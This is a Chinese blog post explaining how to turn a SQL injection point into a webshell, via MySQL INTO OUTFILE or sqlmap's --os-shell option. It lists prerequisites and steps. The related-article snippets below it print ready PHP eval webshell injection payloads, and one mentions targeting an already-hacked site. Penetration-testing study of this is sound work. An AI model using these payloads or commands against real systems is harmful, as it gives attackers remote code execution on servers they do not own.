假如遇到一个注入点如何利用sqlmap这款工具如何去写webshell

最新推荐文章于 2024-04-16 21:37:45 发布
最新推荐文章于 2024-04-16 21:37:45 发布
阅读量3.2k 收藏 3
点赞数 1
分类专栏: 渗透 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45911307/article/details/124131568
版权

利用sql注入写入webshell有两种方式

  1. 利用into outfile函数

利用这个漏洞的先决条件是:

  1. WEB目录具有写的权限,能够使用单引号
  2. 知道网站的根目录或者知道根目录以下的目录
  3. Secure_file_priv没有具体值

过程:

  1. 先判断是否存在注入并判断注入点
  2. 判断列
  3. 判断网站的根目录路径
  4. 使用into outfile函数写入木马文件,在这里要注意路径之间要使用双斜杠
  5. 访问刚刚上传的文件看是否上传成功
  6. 连接木马(使用菜刀,冰蝎,哥斯拉等连接shell的工具)

2.使用—os-shell(使用sqlmap)

这个是利用utf提权进入到webshell,生成两个php文件,一个是文件上传文件,一个是系统命令执行文件

使用条件:

  1. DBA
  2. 要求知道网站的绝对路径
  3. Php的自动转移功能关闭

过程:

  1. 在sqlmap中带上参数跑指定网站,具体语句:

Sqlmap.py -u url?id=1 –-os-shell

  1. 上传两个文件路径,文件名任意。一个为上传文件 ,一个为命令执行
  2. 访问这两个路径进行上传木马或者执行系统命令
-Shadow--
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用SQL注入植入 webshell
小白渣的博客
02-27 6317
这里小结一下通过SQL注入WebShell的方法。 传统的SQL语句shell 通过SQL注入select into outfile实现,如: 1' union ...
SQL注入webshell
xiaoka__的博客
11-21 2502
今天来说一下SQL注入一句话拿webshell的原理,主要使用的是 SELECT … INTO OUTFILE 这个语句,下面是一个语句的例子:       SELECT * INTO OUTFILE ‘C:\log1.txt’ 例如: ?id=1’ union select 1,2,’<?php @eval($_REQUEST[cmd]);?>’ into outfile ‘C:\phpStudy\WWW\502g58de\hahaha.php’ --+ 然后菜刀连接就完了 搞不明白...
一次靶机webshell的几种方式
最新发布
u2943013702的博客
04-16 843
访问该路径,自动下载了www.zip文件,打开查看是网站的源码,那么这个应该是网站的备份源码,不知道是那个管理员放在了网站根目录,在源码的配置文件里得到了数据库的root和密码。数据库管理phpmyadmin后台拿到shell的方法有两种,一种是into outfile 直接入,一种是通过日志入。接下来按照传统的思想,查找表名,查找列,最后得到了网站管理员的账号和密码。这是一个由phpstudy搭建的站点的网站,尝试构造默认的网站根目录。更改路径为我们得到的绝对路径,也就是入shell文件的位置。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
如何利用sqlmap成功上传webshell
Memory1011的博客
12-04 955
转自:http://www.pinlue.com/article/2019/10/1518/319710522228.html
注入webshell
weixin_30920513的博客
09-19 417
两种方法: 方法一:sa权限makewebbtack入 要求:1.必须知道网站物理路径(网站存放的目录)    2.必须有足够大的权限(db以上有列目录的权限)    3.最好是mssql2000 2005    4.开启了makewebbtack入功能 1.进行sql注入,查看当前库(nmgeip),以及权限(sa) 2.找到物理路径(C:/nmgeip)...
sqlmap sql 注入测试工具
03-06
SQLMap是一强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
java开发基于SQLmap的SQL注入工具源码.zip
06-01
基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
第01篇:MySQL注入WebShell的5种方式1
08-03
首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询中。例如,通过构造URL参数如?id=1 union select 1,2,3 into outfile 'E:/path/to/...
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一强大的自动化工具,专门用于检测和利用SQL注入漏洞。它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。...
MySQL注入WebShell的几种方式
热门推荐
04-16 2万+
工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
SQL注入入文件方法(获取webshell
Goodric的博客
04-08 2571
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
上传webshellsqlmap续集2)
qq_46485934的博客
09-17 516
目标站点 找注入点 浏览一遍网站各个栏目,看看哪个地方存在sql注入 在 发卡功能 栏目, 购买卡密 卡密查询 在选择商品是,商品价格,商品库存数据自动跳出,这里应该就有一个数据包,存在数据交互,猜测存在sql注入 抓包 用burp suite抓个包, 这个数据包,POST方法提交,看看数据包内容 红圈处,参数提交,可能存在注入点 测试 做个测试,把数据包发送到burp suite的ripeater模块 在tyid=1 后面加上 and sleep(5) --+,然后go,response延迟显示,说
sqlmap常用渗透方法
weixin_30721899的博客
09-05 593
0X001 适用场景 1.获取了Mysql数据库root账号以及密码。 2.可以访问3306端口以及数据库。 0X002 扫描获取root账号的密码 通常有下面一些方法来获取root账号的密码 (1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html http://pan.baidu.com/s/1c1LD6...
win环境下使用sqlmapshell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1009
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
SQLmap注入获取Webshell常见命令
p_utao的博客
01-22 1064
sqlmap获取shell常见命令 –is-dba:判断是否有dba权限 –os-shell:获取系统交互命令 –sql-shell:获取数据库交互命令 –password:枚举数据库管理系统用户密码哈希值 参考:https://www.cnblogs.com/fzblog/p/13800604.html ...
sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...
weixin_39896839的博客
01-30 727
4.4 使用sqlmap直连MSSQL获取webshell或权限在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密码,而且含有对外可以访问的端口,或者可以通过代理的方式能够访问到端口,简单点理解就是可以通过公网直连MSSQL数据库,那么这个时候就可以根据具体情况获取webshell或系统权限4.4.1 MSSQL数...
SQL注入WebShell方式小结
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入WebShell的方法。 传统的SQL语句shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmapshell 前提都是需要对目标目录具有权限。 -...
通过sql注入漏洞读文件获取webshell
qq_43757105的博客
10-16 4183
一、前提条件: 当前用户具有文件读权限 知道读文件的绝对路径 Mysql.ini设置secure_file_priv为下图所示 二、手工方式 读文件: 文件: 首先发现注入点,可以利用注入手法进行回显 利用into outfile ‘上传文件路径+文件名’ 进行文件操作,如下所示: http://192.168.132.139/sqli-labs-master/Less-1/?id=2' and 1=2 union s...
已知一个网页存在注入点,如何利用sqlmap进行注入,简述注入的过程
06-08
首先,需要确认该网页存在注入漏洞。可以通过手动注入或者使用一些工具进行检测,比如sqlmap自带的扫描功能。 假设我们已经确认该网页存在注入漏洞,以下是利用sqlmap进行注入的简要过程: 1. 确认目标URL,使用`-u`参数指定。 2. 设置注入的等级和风险等级,使用`--level`和`--risk`参数。 3. 指定数据库类型,使用`--dbms`参数。 4. 进行数据库的探测,使用`--dbs`参数。 5. 确认存在的数据库,使用`-D`参数指定数据库。 6. 进行数据表的探测,使用`--tables`参数。 7. 确认存在的数据表,使用`-T`参数指定数据表。 8. 进行数据字段的探测,使用`--columns`参数。 9. 确认存在的数据字段,使用`-C`参数指定数据字段。 10. 获取数据,使用`--dump`参数。 以上是sqlmap进行注入的大致流程,具体的参数和命令需要根据不同的情况进行调整。在进行注入之前,需要确保自己已经了解注入的基本知识,并且已经掌握了sqlmap的使用方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值